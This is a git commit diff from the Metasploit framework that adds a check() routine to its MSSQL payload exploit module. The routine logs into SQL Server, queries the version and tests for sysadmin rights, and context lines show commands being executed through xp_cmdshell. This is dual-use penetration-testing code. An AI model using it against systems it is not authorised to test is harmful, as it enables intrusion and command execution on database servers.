Add a check() for mssql_payload

bug/bundler_fix
James Lee 2015-01-28 13:44:16 -06:00
parent 5475cf50aa
commit 51764eb207
No known key found for this signature in database
GPG Key ID: 2D6094C7CEA0A321
1 changed files with 17 additions and 0 deletions

View File

@ -68,6 +68,23 @@ class Metasploit3 < Msf::Exploit::Remote
]) ])
end end
def check
if (not mssql_login_datastore)
print_status("Invalid SQL Server credentials")
return Exploit::CheckCode::Detected
end
mssql_query("select @@version", true)
if mssql_is_sysadmin
print_good "User #{datastore['USERNAME']} is a sysadmin"
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
ensure
disconnect
end
# This is method required for the CmdStager to work... # This is method required for the CmdStager to work...
def execute_command(cmd, opts) def execute_command(cmd, opts)
mssql_xpcmdshell(cmd, datastore['VERBOSE']) mssql_xpcmdshell(cmd, datastore['VERBOSE'])